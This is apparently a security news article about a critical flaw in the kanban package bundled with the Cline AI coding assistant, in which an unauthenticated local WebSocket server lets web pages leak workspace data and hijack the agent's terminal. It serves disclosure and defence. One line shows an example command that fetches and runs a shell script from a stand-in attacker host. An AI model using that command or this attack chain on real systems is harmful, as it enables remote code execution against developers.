Critical Cline AI Agent Vulnerability Enables Remote Code Execution Attacks

Security researcher Sagilayani disclosed CVE-2026-44211 on GitHub, revealing a severe vulnerability in the kanban npm package bundled with the Cline AI coding assistant.

Carrying a CVSS v3.1 score of 9.3 (Critical), the flaw affects all versions before v2.13.0 and has no patch available as of publication.

Cline AI Agent Vulnerability

The kanban package starts a WebSocket server 127.0.0.1:3484 with zero Origin header validation.

Unlike standard HTTP requests, WebSocket connections bypass browser CORS protections entirely, meaning any malicious webpage can silently connect to the local server without restriction.

The attack unfolds in four stages:

• Info leak — A malicious page connects to /api/runtime/ws and instantly receives workspace data, including filesystem paths, git branch names, task titles, and live AI agent chat messages
• Session detection — The same WebSocket streams task_sessions_updated events, exposing active agent session IDs and process IDs
• Terminal hijack (RCE) — The attacker connects to /api/terminal/io, injects an arbitrary shell command (e.g., curl https://attacker.com/shell.sh | bash), and the AI agent executes it as a user command
• Denial-of-service — The /api/terminal/control endpoint lets attackers kill any running agent session with a simple {"type": "stop"} message

All three vulnerable endpoints require zero authentication and perform no Origin validation.

The attack roots in two weaknesses: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).

The researcher confirmed the exploit across macOS, Linux, and Windows on Firefox, Chrome, and Arc browsers and published a full proof-of-concept alongside the disclosure.

The vulnerability compromises all three pillars of security:

• Confidentiality — Workspace paths, git data, and AI chat messages leak in real time
• Integrity — Arbitrary shell commands execute inside the developer’s environment
• Availability — Active agent tasks can be silently terminated at will

Until a patched version is released, the researcher recommends three mitigations the Cline team should implement:

• Validate the Origin header on all WebSocket upgrade requests, rejecting non-localhost origins
• Generate a random secret token at server startup and require it as a query parameter on all WebSocket connections
• Add authentication checks to terminal WebSocket endpoints to verify the connecting client is the legitimate kanban UI

Developers running Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until an official fix is released.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google

The post Critical Cline AI Agent Vulnerability Enables Remote Code Execution Attacks appeared first on Cyber Security News.